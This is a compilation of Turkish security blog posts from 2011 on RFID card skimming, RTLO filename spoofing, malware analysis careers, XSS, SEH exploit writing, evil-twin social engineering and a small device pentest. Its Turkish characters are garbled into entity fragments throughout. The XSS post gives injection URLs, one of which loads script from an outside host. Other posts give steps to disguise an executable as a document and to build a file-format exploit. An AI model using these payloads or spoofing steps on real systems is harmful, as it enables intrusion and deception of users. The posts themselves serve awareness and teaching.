Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

